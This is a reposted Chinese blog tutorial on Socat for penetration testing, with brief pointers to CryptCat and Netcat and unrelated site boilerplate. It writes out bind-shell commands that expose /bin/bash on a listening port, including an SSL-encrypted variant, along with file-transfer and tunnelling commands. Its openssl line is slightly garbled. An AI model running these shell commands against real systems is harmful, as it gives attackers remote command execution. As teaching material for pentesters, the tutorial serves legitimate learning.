渗透测试中的哪些网络军刀

本文,为大家简单介绍我们常见的网络工具的一些使用方法。

快捷目录

Socat

Socat 是 Linux 下的一个多功能的网络工具。可以看做是 Netcat 的加强版。Socat 的主要特点就是在两个数据流之间建立通道,且支持众多协议和链接方式。如 IP、TCP、 UDP、IPv6、PIPE等。Nc可能是因为比较久没有维护,确实显得有些陈旧了。

😘安装

apt-get install socat

🤖监听 聊天工具

首先,我们在服务端开始监听。(谁做服务端,谁就要加stdout)

socat -dd tcp-listen:7777 stdout

渗透测试中的哪些网络军刀接下来,我们客户端连接。

socat - tcp4:192.168.50.77:7777
渗透测试中的哪些网络军刀

🐸正 反向弹shell

目标机(受害端)执行命令

socat tcp4-listen:8000 exec:/usr/bin/bash

攻击端执行命令

socat - tcp4:192.168.50.77:8000

效果如下:

渗透测试中的哪些网络军刀

😎文件传输

文件传输是最常用的,让我们一起看看如何实现。发送端执行命令

socat tcp4-listen:8000 file:kali.txt

接收端执行命令

socat tcp4:192.168.50.77:8000 file:kali.txt,creat
渗透测试中的哪些网络军刀

🐻‍❄️搭建异地组网

需要注意的是,服务端需为公网vps。

socat -d -d TCP-LISTEN:11443,reuseaddr TUN:192.168.255.1/24,up

客户端

socat TCP:xxx.xxx.xxx.xxx:11443 TUN:192.168.255.2/24,up #注意为公网IP和开启相关端口

📧SSL 连接

前面我们使用 socat 传 shell 的时候,其实交流的内容是明文传输的。为了让信息传输更加安全,我们借助 SSL 证书来完成这个操作。首先使用 openssl 这个软件,生成一个自签证书,为了让 socat 可以识别我们的证书和密钥,首先要把证书和密钥放进同一个文件中,并以.pem格式保存

openssl reg -newkey rsa:2048 -nodes -keyout bind_shell.key -x509 -days 36
2 -out bind shell.crt

接下来,服务端执行命令

socat OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0,fork EXEC:/bin/bash

客户端执行命令

socat - OPENSSL:监听端的 IP:443,verify=0

当然,还有更多的玩法。大家可以参考命令帮助。

渗透测试中的哪些网络军刀

CryptCat

CryptCat具有双向加密功能。它可以跨网络连接读取和写入数据,使用 TCP 或 UDP协议。同时对通过网络传输的数据进行加密。详细教程请移步历史文章。

渗透测试中的哪些网络军刀
NC增强工具CryptCat

Netcat

之前也写过详细的使用文章,详细教程请移步历史文章。

渗透测试中的哪些网络军刀
Netcat(瑞士军刀)你想知道的都在这里

本内容观点仅代表发布作者本人观点立场,欣文网平台只做信息内容展示和存储。发布作者:全网转载,转转请注明出处:https://www.xinenw.com/34468.html

(0)
打赏 微信扫一扫 微信扫一扫 支付宝扫一扫 支付宝扫一扫
上一篇 2024年8月11日 19:31
下一篇 2024年8月11日 21:16

相关推荐

  • 0比7惨败:我们为何仍在关注国足?

    王锦舟 湖南工商大学 ——2024年度红网“青椒评论”系列作品 9月5日晚,国际足联2026世界杯亚洲区预选赛第三阶段第一轮日本国家男子足球队VS中国国家男子足球队全场比赛结束,中国队以0-7失利。此役创造了中国男足对日本的历史最大比分失利、世预赛单场最多丢球以及世预赛最大比分失利等三大耻辱记录。 国足,再次以不光彩的形象,站上舆论的风口浪尖,引发全国范围的…

    2024年9月9日
    12700
  • 让天工AI帮我打工后,我知道了什么叫新质生产力……

    △点击上方蓝字或下方卡片,和小柴一起防忽悠 互联网之后,谁可以成为下一场科技革命?如果小柴说是AI,想必没有还在含糊的柴油吧!‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍‍ 因为大家的感受,都足够深切! 一是,全球的巨头和资本们,都在挤破头了抢占先机,比如默默无闻了近10年的Op…

    2024年5月23日
    15500
  • 300W!国产手机这个新技术,太逆天了

    早两天,realme 真我的 300W 手机快充曝光。 昨天,realme 公布了 300W 闪充交流会的相关消息。 万万没想到,今天,它又来了。 今天,网络上直接就放出了真我的 300W 快充技术测试视频。 视频本身,机哥替机友们看了。 它的信息很少。 就一句话 ——  realme 的 300W 闪充测试机,15 秒充电 6%,30 秒充电充 15%。 …

    2024年8月10日
    10900
  • 康师傅方便面即将全线涨价?理由是“配方升级”

    本文转自每日经济新闻 据陕西网白鹿视频官方微博,5月16日,网传康师傅方便面即将全线涨价,涨价的由头,则是“配方升级”。该消息一度登上微博热搜。 对此,记者联系康师傅多个网购平台官方店铺了解情况,得到回应并未一致。其中康师傅淘宝官方旗舰店、京东官方旗舰店、抖音食品旗舰店客服表示:目前没有接到通知。康师傅拼多多官方旗舰店客服表示目前暂未涨价,后续会涨价的。 图…

    2024年5月21日
    23100
  • “家丑外扬”的标语,应该更多一些

    可能是哥孤陋寡闻,我已经很久没有看到这样的标语了。 简洁朴实,但威慑力十足。 7月14日,一大哥开车路过湖南平江县加义镇,发现路边有很多红底白字。 “强奸猥亵未成年人,三年以上,直至死刑。” “与未满14周岁女性发生性关系,不论是否自愿,以强奸罪论!” 大哥说他本来没想拍的,但一路这些标语出现的频率实在太高,属实把他震惊到了。 底下的湖南网友则说大哥真是大惊…

    2024年7月17日
    10600

发表回复

登录后才能评论

联系我们

400-800-8888

在线咨询: QQ交谈

邮件A:xinenw@qq.com

邮箱B:xinenw@163.com

工作时间:周一至周五,8:30-23:30;周六周日10:30-18:30;节假日休息

关注微信